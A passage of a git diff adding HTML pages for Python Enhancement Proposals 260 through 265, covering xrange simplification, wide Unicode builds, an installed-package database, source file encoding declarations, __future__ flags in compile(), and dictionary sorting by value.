Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+
26-Jun-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to strip the xrange() object from some rarely +used behavior like x[i:j] and x*n.

+
+
+

Problem

+

The xrange() function has one idiomatic use:

+
for i in xrange(...): ...
+
+
+

However, the xrange() object has a bunch of rarely used behaviors +that attempt to make it more sequence-like. These are so rarely +used that historically they have has serious bugs (e.g. off-by-one +errors) that went undetected for several releases.

+

I claim that it’s better to drop these unused features. This will +simplify the implementation, testing, and documentation, and +reduce maintenance and code size.

+
+
+

Proposed Solution

+

I propose to strip the xrange() object to the bare minimum. The +only retained sequence behaviors are x[i], len(x), and repr(x). +In particular, these behaviors will be dropped:

+
    +
  • x[i:j] (slicing)
  • +
  • x*n, n*x (sequence-repeat)
  • +
  • cmp(x1, x2) (comparisons)
  • +
  • i in x (containment test)
  • +
  • x.tolist() method
  • +
  • x.start, x.stop, x.step attributes
  • +
+

I also propose to change the signature of the PyRange_New() C API +to remove the 4th argument (the repetition count).

+

By implementing a custom iterator type, we could speed up the +common use, but this is optional (the default sequence iterator +does just fine).

+
+
+

Scope

+

This PEP affects the xrange() built-in function and the +PyRange_New() C API.

+
+
+

Risks

+

Somebody’s code could be relying on the extended code, and this +code would break. However, given that historically bugs in the +extended code have gone undetected for so long, it’s unlikely that +much code is affected.

+
+
+

Transition

+

For backwards compatibility, the existing functionality will still +be present in Python 2.2, but will trigger a warning. A year +after Python 2.2 final is released (probably in 2.4) the +functionality will be ripped out.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0260.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0261/index.html b/pep-0261/index.html new file mode 100644 index 00000000000..7110a81d039 --- /dev/null +++ b/pep-0261/index.html @@ -0,0 +1,370 @@ + + + + + + + + PEP 261 – Support for “wide” Unicode characters | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 261 – Support for “wide” Unicode characters

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+
27-Jun-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python 2.1 unicode characters can have ordinals only up to 2**16 - 1. +This range corresponds to a range in Unicode known as the Basic +Multilingual Plane. There are now characters in Unicode that live +on other “planes”. The largest addressable character in Unicode +has the ordinal 17 * 2**16 - 1 (0x10ffff). For readability, we +will call this TOPCHAR and call characters in this range “wide +characters”.

+
+
+

Glossary

+
+
Character
Used by itself, means the addressable units of a Python +Unicode string.
+
Code point
A code point is an integer between 0 and TOPCHAR. +If you imagine Unicode as a mapping from integers to +characters, each integer is a code point. But the +integers between 0 and TOPCHAR that do not map to +characters are also code points. Some will someday +be used for characters. Some are guaranteed never +to be used for characters.
+
Codec
A set of functions for translating between physical +encodings (e.g. on disk or coming in from a network) +into logical Python objects.
+
Encoding
Mechanism for representing abstract characters in terms of +physical bits and bytes. Encodings allow us to store +Unicode characters on disk and transmit them over networks +in a manner that is compatible with other Unicode software.
+
Surrogate pair
Two physical characters that represent a single logical +character. Part of a convention for representing 32-bit +code points in terms of two 16-bit code points.
+
Unicode string
A Python type representing a sequence of code points with +“string semantics” (e.g. case conversions, regular +expression compatibility, etc.) Constructed with the +unicode() function.
+
+
+
+

Proposed Solution

+

One solution would be to merely increase the maximum ordinal +to a larger value. Unfortunately the only straightforward +implementation of this idea is to use 4 bytes per character. +This has the effect of doubling the size of most Unicode +strings. In order to avoid imposing this cost on every +user, Python 2.2 will allow the 4-byte implementation as a +build-time option. Users can choose whether they care about +wide characters or prefer to preserve memory.

+

The 4-byte option is called “wide Py_UNICODE”. The 2-byte option +is called “narrow Py_UNICODE”.

+

Most things will behave identically in the wide and narrow worlds.

+
    +
  • unichr(i) for 0 <= i < 2**16 (0x10000) always returns a +length-one string.
  • +
  • unichr(i) for 2**16 <= i <= TOPCHAR will return a +length-one string on wide Python builds. On narrow builds it will +raise ValueError.

    ISSUE

    +
    +
    Python currently allows \U literals that cannot be +represented as a single Python character. It generates two +Python characters known as a “surrogate pair”. Should this +be disallowed on future narrow Python builds?
    +

    Pro:

    +
    +
    Python already the construction of a surrogate pair +for a large unicode literal character escape sequence. +This is basically designed as a simple way to construct +“wide characters” even in a narrow Python build. It is also +somewhat logical considering that the Unicode-literal syntax +is basically a short-form way of invoking the unicode-escape +codec.
    +

    Con:

    +
    +
    Surrogates could be easily created this way but the user +still needs to be careful about slicing, indexing, printing +etc. Therefore, some have suggested that Unicode +literals should not support surrogates.
    +

    ISSUE

    +
    +
    Should Python allow the construction of characters that do +not correspond to Unicode code points? Unassigned Unicode +code points should obviously be legal (because they could +be assigned at any time). But code points above TOPCHAR are +guaranteed never to be used by Unicode. Should we allow access +to them anyhow?
    +

    Pro:

    +
    +
    If a Python user thinks they know what they’re doing why +should we try to prevent them from violating the Unicode +spec? After all, we don’t stop 8-bit strings from +containing non-ASCII characters.
    +

    Con:

    +
    +
    Codecs and other Unicode-consuming code will have to be +careful of these characters which are disallowed by the +Unicode specification.
    +
  • +
  • ord() is always the inverse of unichr()
  • +
  • There is an integer value in the sys module that describes the +largest ordinal for a character in a Unicode string on the current +interpreter. sys.maxunicode is 2**16-1 (0xffff) on narrow builds +of Python and TOPCHAR on wide builds.

    ISSUE:

    +
    +
    Should there be distinct constants for accessing +TOPCHAR and the real upper bound for the domain of +unichr (if they differ)? There has also been a +suggestion of sys.unicodewidth which can take the +values 'wide' and 'narrow'.
    +
  • +
  • every Python Unicode character represents exactly one Unicode code +point (i.e. Python Unicode Character = Abstract Unicode character).
  • +
  • codecs will be upgraded to support “wide characters” +(represented directly in UCS-4, and as variable-length sequences +in UTF-8 and UTF-16). This is the main part of the implementation +left to be done.
  • +
  • There is a convention in the Unicode world for encoding a 32-bit +code point in terms of two 16-bit code points. These are known +as “surrogate pairs”. Python’s codecs will adopt this convention +and encode 32-bit code points as surrogate pairs on narrow Python +builds.

    ISSUE

    +
    +
    Should there be a way to tell codecs not to generate +surrogates and instead treat wide characters as +errors?
    +

    Pro:

    +
    +
    I might want to write code that works only with +fixed-width characters and does not have to worry about +surrogates.
    +

    Con:

    +
    +
    No clear proposal of how to communicate this to codecs.
    +
  • +
  • there are no restrictions on constructing strings that use +code points “reserved for surrogates” improperly. These are +called “isolated surrogates”. The codecs should disallow reading +these from files, but you could construct them using string +literals or unichr().
  • +
+
+
+

Implementation

+

There is a new define:

+
#define Py_UNICODE_SIZE 2
+
+
+

To test whether UCS2 or UCS4 is in use, the derived macro +Py_UNICODE_WIDE should be used, which is defined when UCS-4 is in +use.

+

There is a new configure option:

+ + + + + + + + + + + + + + + +
–enable-unicode=ucs2configures a narrow Py_UNICODE, and uses +wchar_t if it fits
–enable-unicode=ucs4configures a wide Py_UNICODE, and uses +wchar_t if it fits
–enable-unicodesame as “=ucs2”
–disable-unicodeentirely remove the Unicode functionality.
+

It is also proposed that one day --enable-unicode will just +default to the width of your platforms wchar_t.

+

Windows builds will be narrow for a while based on the fact that +there have been few requests for wide characters, those requests +are mostly from hard-core programmers with the ability to buy +their own Python and Windows itself is strongly biased towards +16-bit characters.

+
+
+

Notes

+

This PEP does NOT imply that people using Unicode need to use a +4-byte encoding for their files on disk or sent over the network. +It only allows them to do so. For example, ASCII is still a +legitimate (7-bit) Unicode-encoding.

+

It has been proposed that there should be a module that handles +surrogates in narrow Python builds for programmers. If someone +wants to implement that, it will be another PEP. It might also be +combined with features that allow other kinds of character-, +word- and line- based indexing.

+
+
+

Rejected Suggestions

+

More or less the status-quo

+
+
We could officially say that Python characters are 16-bit and +require programmers to implement wide characters in their +application logic by combining surrogate pairs. This is a heavy +burden because emulating 32-bit characters is likely to be +very inefficient if it is coded entirely in Python. Plus these +abstracted pseudo-strings would not be legal as input to the +regular expression engine.
+

“Space-efficient Unicode” type

+
+
Another class of solution is to use some efficient storage +internally but present an abstraction of wide characters to +the programmer. Any of these would require a much more complex +implementation than the accepted solution. For instance consider +the impact on the regular expression engine. In theory, we could +move to this implementation in the future without breaking Python +code. A future Python could “emulate” wide Python semantics on +narrow Python. Guido is not willing to undertake the +implementation right now.
+

Two types

+
+
We could introduce a 32-bit Unicode type alongside the 16-bit +type. There is a lot of code that expects there to be only a +single Unicode type.
+

This PEP represents the least-effort solution. Over the next +several years, 32-bit Unicode characters will become more common +and that may either convince us that we need a more sophisticated +solution or (on the other hand) convince us that simply +mandating wide Unicode characters is an appropriate solution. +Right now the two options on the table are do nothing or do +this.

+
+
+

References

+

Unicode Glossary: http://www.unicode.org/glossary/

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0261.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0262/index.html b/pep-0262/index.html new file mode 100644 index 00000000000..cfcf18d2e08 --- /dev/null +++ b/pep-0262/index.html @@ -0,0 +1,450 @@ + + + + + + + + PEP 262 – A Database of Installed Python Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 262 – A Database of Installed Python Packages

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Jul-2001
+
Post-History:
+
27-Mar-2002
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP was superseded by PEP 345 and PEP 376, which were accepted. +Therefore, this PEP is (by implication) rejected.

+
+
+

Introduction

+

This PEP describes a format for a database of the Python software +installed on a system.

+

(In this document, the term “distribution” is used to mean a set +of code that’s developed and distributed together. A “distribution” +is the same as a Red Hat or Debian package, but the term “package” +already has a meaning in Python terminology, meaning “a directory +with an __init__.py file in it.”)

+
+
+

Requirements

+

We need a way to figure out what distributions, and what versions of +those distributions, are installed on a system. We want to provide +features similar to CPAN, APT, or RPM. Required use cases that +should be supported are:

+
    +
  • Is distribution X on a system?
  • +
  • What version of distribution X is installed?
  • +
  • Where can the new version of distribution X be found? (This can +be defined as either “a home page where the user can go and +find a download link”, or “a place where a program can find +the newest version?” Both should probably be supported.)
  • +
  • What files did distribution X put on my system?
  • +
  • What distribution did the file x/y/z.py come from?
  • +
  • Has anyone modified x/y/z.py locally?
  • +
  • What other distributions does this software need?
  • +
  • What Python modules does this distribution provide?
  • +
+
+
+

Database Location

+

The database lives in a bunch of files under +<prefix>/lib/python<version>/install-db/. This location will be +called INSTALLDB through the remainder of this PEP.

+

The structure of the database is deliberately kept simple; each +file in this directory or its subdirectories (if any) describes a +single distribution. Binary packagings of Python software such as +RPMs can then update Python’s database by just installing the +corresponding file into the INSTALLDB directory.

+

The rationale for scanning subdirectories is that we can move to a +directory-based indexing scheme if the database directory contains +too many entries. For example, this would let us transparently +switch from INSTALLDB/Numeric to INSTALLDB/N/Nu/Numeric or some +similar hashing scheme.

+
+
+

Database Contents

+

Each file in INSTALLDB or its subdirectories describes a single +distribution, and has the following contents:

+

An initial line listing the sections in this file, separated +by whitespace. Currently this will always be ‘PKG-INFO FILES +REQUIRES PROVIDES’. This is for future-proofing; if we add a +new section, for example to list documentation files, then +we’d add a DOCS section and list it in the contents. Sections +are always separated by blank lines.

+

A distribution that uses the Distutils for installation should +automatically update the database. Distributions that roll their +own installation will have to use the database’s API to +manually add or update their own entry. System package managers +such as RPM or pkgadd can just create the new file in the +INSTALLDB directory.

+

Each section of the file is used for a different purpose.

+
+

PKG-INFO section

+

An initial set of RFC 822 headers containing the distribution +information for a file, as described in PEP 241, “Metadata for +Python Software Packages”.

+
+
+

FILES section

+

An entry for each file installed by the +distribution. Generated files such as .pyc and .pyo files are +on this list as well as the original .py files installed by a +distribution; their checksums won’t be stored or checked, +though.

+

Each file’s entry is a single tab-delimited line that contains +the following fields:

+
    +
  • The file’s full path, as installed on the system.
  • +
  • The file’s size
  • +
  • The file’s permissions. On Windows, this field will always be +‘unknown’
  • +
  • The owner and group of the file, separated by a tab. +On Windows, these fields will both be ‘unknown’.
  • +
  • A SHA1 digest of the file, encoded in hex. For generated files +such as *.pyc files, this field must contain the string “-“, +which indicates that the file’s checksum should not be verified.
  • +
+
+
+

REQUIRES section

+

This section is a list of strings giving the services required for +this module distribution to run properly. This list includes the +distribution name (“python-stdlib”) and module names (“rfc822”, +“htmllib”, “email”, “email.Charset”). It will be specified +by an extra ‘requires’ argument to the distutils.core.setup() +function. For example:

+
setup(..., requires=['xml.utils.iso8601',
+
+
+

Eventually there may be automated tools that look through all of +the code and produce a list of requirements, but it’s unlikely +that these tools can handle all possible cases; a manual +way to specify requirements will always be necessary.

+
+
+

PROVIDES section

+

This section is a list of strings giving the services provided by +an installed distribution. This list includes the distribution name +(“python-stdlib”) and module names (“rfc822”, “htmllib”, “email”, +“email.Charset”).

+

XXX should files be listed? e.g. $PREFIX/lib/color-table.txt, +to pick up data files, required scripts, etc.

+

Eventually there may be an option to let module developers add +their own strings to this section. For example, you might add +“XML parser” to this section, and other module distributions could +then list “XML parser” as one of their dependencies to indicate +that multiple different XML parsers can be used. For now this +ability isn’t supported because it raises too many issues: do we +need a central registry of legal strings, or just let people put +whatever they like? Etc., etc…

+
+
+
+

API Description

+

There’s a single fundamental class, InstallationDatabase. The +code for it lives in distutils/install_db.py. (XXX any +suggestions for alternate locations in the standard library, or an +alternate module name?)

+

The InstallationDatabase returns instances of Distribution that contain +all the information about an installed distribution.

+

XXX Several of the fields in Distribution are duplicates of ones in +distutils.dist.Distribution. Probably they should be factored out +into the Distribution class proposed here, but can this be done in a +backward-compatible way?

+

InstallationDatabase has the following interface:

+
class InstallationDatabase:
+    def __init__ (self, path=None):
+        """InstallationDatabase(path:string)
+        Read the installation database rooted at the specified path.
+        If path is None, INSTALLDB is used as the default.
+        """
+
+    def get_distribution (self, distribution_name):
+        """get_distribution(distribution_name:string) : Distribution
+        Get the object corresponding to a single distribution.
+        """
+
+    def list_distributions (self):
+        """list_distributions() : [Distribution]
+        Return a list of all distributions installed on the system,
+        enumerated in no particular order.
+        """
+
+    def find_distribution (self, path):
+        """find_file(path:string) : Distribution
+        Search and return the distribution containing the file 'path'.
+        Returns None if the file doesn't belong to any distribution
+        that the InstallationDatabase knows about.
+        XXX should this work for directories?
+        """
+
+class Distribution:
+    """Instance attributes:
+    name : string
+      Distribution name
+    files : {string : (size:int, perms:int, owner:string, group:string,
+                       digest:string)}
+       Dictionary mapping the path of a file installed by this distribution
+       to information about the file.
+
+    The following fields all come from PEP 241.
+
+    version : distutils.version.Version
+      Version of this distribution
+    platform : [string]
+    summary : string
+    description : string
+    keywords : string
+    home_page : string
+    author : string
+    author_email : string
+    license : string
+    """
+
+    def add_file (self, path):
+        """add_file(path:string):None
+        Record the size, ownership, &c., information for an installed file.
+        XXX as written, this would stat() the file.  Should the size/perms/
+        checksum all be provided as parameters to this method instead?
+        """
+
+    def has_file (self, path):
+        """has_file(path:string) : Boolean
+        Returns true if the specified path belongs to a file in this
+        distribution.
+        """
+
+     def check_file (self, path):
+        """check_file(path:string) : Boolean
+        Checks whether the file's size, checksum, and ownership match,
+        returning true if they do.
+        """
+
+
+
+
+

Deliverables

+

A description of the database API, to be added to this PEP.

+

Patches to the Distutils that 1) implement an InstallationDatabase +class, 2) Update the database when a new distribution is installed. 3) +add a simple package management tool, features to be added to this +PEP. (Or should that be a separate PEP?) See [2] for the current +patch.

+
+
+

Open Issues

+

PJE suggests the installation database “be potentially present on +every directory in sys.path, with the contents merged in sys.path +order. This would allow home-directory or other +alternate-location installs to work, and ease the process of a +distutils install command writing the file.” Nice feature: it does +mean that package manager tools can take into account Python +packages that a user has privately installed.

+

AMK wonders: what does setup.py do if it’s told to install +packages to a directory not on sys.path? Does it write an +install-db directory to the directory it’s told to write to, or +does it do nothing?

+

Should the package-database file itself be included in the files +list? (PJE would think yes, but of course it can’t contain its +own checksum. AMK can’t think of a use case where including the +DB file matters.)

+

PJE wonders about writing the package DB file +first, before installing any other files, so that failed partial +installations can both be backed out, and recognized as broken. +This PEP may have to specify some algorithm for recognizing this +situation.

+

Should we guarantee the format of installation databases remains +compatible across Python versions, or is it subject to arbitrary +change? Probably we need to guarantee compatibility.

+
+
+

Rejected Suggestions

+

Instead of using one text file per distribution, one large text +file or an anydbm file could be used. This has been rejected for +a few reasons. First, performance is probably not an extremely +pressing concern as the database is only used when installing or +removing software, a relatively infrequent task. Scalability also +likely isn’t a problem, as people may have hundreds of Python +packages installed, but thousands or tens of thousands seems +unlikely. Finally, individual text files are compatible with +installers such as RPM or DPKG because a binary packager can just +drop the new database file into the database directory. If one +large text file or a binary file were used, the Python database +would then have to be updated by running a postinstall script.

+

On Windows, the permissions and owner/group of a file aren’t +stored. Windows does in fact support ownership and access +permissions, but reading and setting them requires the win32all +extensions, and they aren’t present in the basic Python installer +for Windows.

+
+
+

References

+

[1] Michael Muller’s patch (posted to the Distutils-SIG around 28 + Dec 1999) generates a list of installed files.

+ +
+
+

Acknowledgements

+

Ideas for this PEP originally came from postings by Greg Ward, +Fred L. Drake Jr., Thomas Heller, Mats Wichmann, Phillip J. Eby, +and others.

+

Many changes and rewrites to this document were suggested by the +readers of the Distutils SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0262.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0263/index.html b/pep-0263/index.html new file mode 100644 index 00000000000..ee83ccbb63c --- /dev/null +++ b/pep-0263/index.html @@ -0,0 +1,392 @@ + + + + + + + + PEP 263 – Defining Python Source Code Encodings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 263 – Defining Python Source Code Encodings

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>, +Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-Jun-2001
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to introduce a syntax to declare the encoding of +a Python source file. The encoding information is then used by the +Python parser to interpret the file using the given encoding. Most +notably this enhances the interpretation of Unicode literals in +the source code and makes it possible to write Unicode literals +using e.g. UTF-8 directly in an Unicode aware editor.

+
+
+

Problem

+

In Python 2.1, Unicode literals can only be written using the +Latin-1 based encoding “unicode-escape”. This makes the +programming environment rather unfriendly to Python users who live +and work in non-Latin-1 locales such as many of the Asian +countries. Programmers can write their 8-bit strings using the +favorite encoding, but are bound to the “unicode-escape” encoding +for Unicode literals.

+
+
+

Proposed Solution

+

I propose to make the Python source code encoding both visible and +changeable on a per-source file basis by using a special comment +at the top of the file to declare the encoding.

+

To make Python aware of this encoding declaration a number of +concept changes are necessary with respect to the handling of +Python source code data.

+
+
+

Defining the Encoding

+

Python will default to ASCII as standard encoding if no other +encoding hints are given.

+

To define a source code encoding, a magic comment must +be placed into the source files either as first or second +line in the file, such as:

+
# coding=<encoding name>
+
+
+

or (using formats recognized by popular editors):

+
#!/usr/bin/python
+# -*- coding: <encoding name> -*-
+
+
+

or:

+
#!/usr/bin/python
+# vim: set fileencoding=<encoding name> :
+
+
+

More precisely, the first or second line must match the following +regular expression:

+
^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)
+
+
+

The first group of this +expression is then interpreted as encoding name. If the encoding +is unknown to Python, an error is raised during compilation. There +must not be any Python statement on the line that contains the +encoding declaration. If the first line matches the second line +is ignored.

+

To aid with platforms such as Windows, which add Unicode BOM marks +to the beginning of Unicode files, the UTF-8 signature +\xef\xbb\xbf will be interpreted as ‘utf-8’ encoding as well +(even if no magic encoding comment is given).

+

If a source file uses both the UTF-8 BOM mark signature and a +magic encoding comment, the only allowed encoding for the comment +is ‘utf-8’. Any other encoding will cause an error.

+
+
+

Examples

+

These are some examples to clarify the different styles for +defining the source code encoding at the top of a Python source +file:

+
    +
  1. With interpreter binary and using Emacs style file encoding +comment:
    #!/usr/bin/python
    +# -*- coding: latin-1 -*-
    +import os, sys
    +...
    +
    +#!/usr/bin/python
    +# -*- coding: iso-8859-15 -*-
    +import os, sys
    +...
    +
    +#!/usr/bin/python
    +# -*- coding: ascii -*-
    +import os, sys
    +...
    +
    +
    +
  2. +
  3. Without interpreter line, using plain text:
    # This Python file uses the following encoding: utf-8
    +import os, sys
    +...
    +
    +
    +
  4. +
  5. Text editors might have different ways of defining the file’s +encoding, e.g.:
    #!/usr/local/bin/python
    +# coding: latin-1
    +import os, sys
    +...
    +
    +
    +
  6. +
  7. Without encoding comment, Python’s parser will assume ASCII +text:
    #!/usr/local/bin/python
    +import os, sys
    +...
    +
    +
    +
  8. +
  9. Encoding comments which don’t work:
      +
    1. Missing “coding:” prefix:
      #!/usr/local/bin/python
      +# latin-1
      +import os, sys
      +...
      +
      +
      +
    2. +
    3. Encoding comment not on line 1 or 2:
      #!/usr/local/bin/python
      +#
      +# -*- coding: latin-1 -*-
      +import os, sys
      +...
      +
      +
      +
    4. +
    5. Unsupported encoding:
      #!/usr/local/bin/python
      +# -*- coding: utf-42 -*-
      +import os, sys
      +...
      +
      +
      +
    6. +
    +
  10. +
+
+
+

Concepts

+

The PEP is based on the following concepts which would have to be +implemented to enable usage of such a magic comment:

+
    +
  1. The complete Python source file should use a single encoding. +Embedding of differently encoded data is not allowed and will +result in a decoding error during compilation of the Python +source code.

    Any encoding which allows processing the first two lines in the +way indicated above is allowed as source code encoding, this +includes ASCII compatible encodings as well as certain +multi-byte encodings such as Shift_JIS. It does not include +encodings which use two or more bytes for all characters like +e.g. UTF-16. The reason for this is to keep the encoding +detection algorithm in the tokenizer simple.

    +
  2. +
  3. Handling of escape sequences should continue to work as it does +now, but with all possible source code encodings, that is +standard string literals (both 8-bit and Unicode) are subject to +escape sequence expansion while raw string literals only expand +a very small subset of escape sequences.
  4. +
  5. Python’s tokenizer/compiler combo will need to be updated to +work as follows:
      +
    1. read the file
    2. +
    3. decode it into Unicode assuming a fixed per-file encoding
    4. +
    5. convert it into a UTF-8 byte string
    6. +
    7. tokenize the UTF-8 content
    8. +
    9. compile it, creating Unicode objects from the given Unicode data +and creating string objects from the Unicode literal data +by first reencoding the UTF-8 data into 8-bit string data +using the given file encoding
    10. +
    +
  6. +
+

Note that Python identifiers are restricted to the ASCII +subset of the encoding, and thus need no further conversion +after step 4.

+
+
+

Implementation

+

For backwards-compatibility with existing code which currently +uses non-ASCII in string literals without declaring an encoding, +the implementation will be introduced in two phases:

+
    +
  1. Allow non-ASCII in string literals and comments, by internally +treating a missing encoding declaration as a declaration of +“iso-8859-1”. This will cause arbitrary byte strings to +correctly round-trip between step 2 and step 5 of the +processing, and provide compatibility with Python 2.2 for +Unicode literals that contain non-ASCII bytes.

    A warning will be issued if non-ASCII bytes are found in the +input, once per improperly encoded input file.

    +
  2. +
  3. Remove the warning, and change the default encoding to “ascii”.
  4. +
+

The builtin compile() API will be enhanced to accept Unicode as +input. 8-bit string input is subject to the standard procedure for +encoding detection as described above.

+

If a Unicode string with a coding declaration is passed to compile(), +a SyntaxError will be raised.

+

SUZUKI Hisao is working on a patch; see [2] for details. A patch +implementing only phase 1 is available at [1].

+
+
+

Phases

+

Implementation of steps 1 and 2 above were completed in 2.3, +except for changing the default encoding to “ascii”.

+

The default encoding was set to “ascii” in version 2.5.

+
+
+

Scope

+

This PEP intends to provide an upgrade path from the current +(more-or-less) undefined source code encoding situation to a more +robust and portable definition.

+
+
+

References

+ +
+
+

History

+
    +
  • 1.10 and above: see CVS history
  • +
  • 1.8: Added ‘.’ to the coding RE.
  • +
  • 1.7: Added warnings to phase 1 implementation. Replaced the +Latin-1 default encoding with the interpreter’s default +encoding. Added tweaks to compile().
  • +
  • 1.4 - 1.6: Minor tweaks
  • +
  • 1.3: Worked in comments by Martin v. Loewis: +UTF-8 BOM mark detection, Emacs style magic comment, +two phase approach to the implementation
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0263.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0264/index.html b/pep-0264/index.html new file mode 100644 index 00000000000..7f4264b80a3 --- /dev/null +++ b/pep-0264/index.html @@ -0,0 +1,248 @@ + + + + + + + + PEP 264 – Future statements in simulated shells | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 264 – Future statements in simulated shells

+
+
Author:
+
Michael Hudson <mwh at python.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
236
+
Created:
+
30-Jul-2001
+
Python-Version:
+
2.2
+
Post-History:
+
30-Jul-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

As noted in PEP 236, there is no clear way for “simulated +interactive shells” to simulate the behaviour of __future__ +statements in “real” interactive shells, i.e. have __future__ +statements’ effects last the life of the shell.

+

The PEP also takes the opportunity to clean up the other +unresolved issue mentioned in PEP 236, the inability to stop +compile() inheriting the effect of future statements affecting the +code calling compile().

+

This PEP proposes to address the first problem by adding an +optional fourth argument to the builtin function “compile”, adding +information to the _Feature instances defined in __future__.py and +adding machinery to the standard library modules “codeop” and +“code” to make the construction of such shells easy.

+

The second problem is dealt with by simply adding another +optional argument to compile(), which if non-zero suppresses the +inheriting of future statements’ effects.

+
+
+

Specification

+

I propose adding a fourth, optional, “flags” argument to the +builtin “compile” function. If this argument is omitted, +there will be no change in behaviour from that of Python 2.1.

+

If it is present it is expected to be an integer, representing +various possible compile time options as a bitfield. The +bitfields will have the same values as the CO_* flags already used +by the C part of Python interpreter to refer to future statements.

+

compile() shall raise a ValueError exception if it does not +recognize any of the bits set in the supplied flags.

+

The flags supplied will be bitwise-“or”ed with the flags that +would be set anyway, unless the new fifth optional argument is a +non-zero integer, in which case the flags supplied will be exactly +the set used.

+

The above-mentioned flags are not currently exposed to Python. I +propose adding .compiler_flag attributes to the _Feature objects +in __future__.py that contain the necessary bits, so one might +write code such as:

+
import __future__
+def compile_generator(func_def):
+    return compile(func_def, "<input>", "suite",
+                __future__.generators.compiler_flag)
+
+
+

A recent change means that these same bits can be used to tell if +a code object was compiled with a given feature; for instance

+
codeob.co_flags & __future__.generators.compiler_flag``
+
+
+

will be non-zero if and only if the code object “codeob” was +compiled in an environment where generators were allowed.

+

I will also add a .all_feature_flags attribute to the __future__ +module, giving a low-effort way of enumerating all the __future__ +options supported by the running interpreter.

+

I also propose adding a pair of classes to the standard library +module codeop.

+

One - Compile - will sport a __call__ method which will act much +like the builtin “compile” of 2.1 with the difference that after +it has compiled a __future__ statement, it “remembers” it and +compiles all subsequent code with the __future__ option in effect.

+

It will do this by using the new features of the __future__ module +mentioned above.

+

Objects of the other class added to codeop - CommandCompiler - +will do the job of the existing codeop.compile_command function, +but in a __future__-aware way.

+

Finally, I propose to modify the class InteractiveInterpreter in +the standard library module code to use a CommandCompiler to +emulate still more closely the behaviour of the default Python +shell.

+
+
+

Backward Compatibility

+

Should be very few or none; the changes to compile will make no +difference to existing code, nor will adding new functions or +classes to codeop. Existing code using +code.InteractiveInterpreter may change in behaviour, but only for +the better in that the “real” Python shell will be being better +impersonated.

+
+
+

Forward Compatibility

+

The fiddling that needs to be done to Lib/__future__.py when +adding a __future__ feature will be a touch more complicated. +Everything else should just work.

+
+
+

Issues

+

I hope the above interface is not too disruptive to implement for +Jython.

+
+
+

Implementation

+

A series of preliminary implementations are at [1].

+

After light massaging by Tim Peters, they have now been checked in.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0264.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0265/index.html b/pep-0265/index.html new file mode 100644 index 00000000000..c93b97230a6 --- /dev/null +++ b/pep-0265/index.html @@ -0,0 +1,311 @@ + + + + + + + + PEP 265 – Sorting Dictionaries by Value | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 265 – Sorting Dictionaries by Value

+
+
Author:
+
Grant Griffin <g2 at iowegian.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
08-Aug-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP suggests a “sort by value” operation for dictionaries. +The primary benefit would be in terms of “batteries included” +support for a common Python idiom which, in its current form, is +both difficult for beginners to understand and cumbersome for all +to implement.

+
+
+

BDFL Pronouncement

+

This PEP is rejected because the need for it has been largely +fulfilled by Py2.4’s sorted() builtin function:

+
>>> sorted(d.iteritems(), key=itemgetter(1), reverse=True)
+[('b', 23), ('d', 17), ('c', 5), ('a', 2), ('e', 1)]
+
+
+

or for just the keys:

+
sorted(d, key=d.__getitem__, reverse=True)
+['b', 'd', 'c', 'a', 'e']
+
+
+

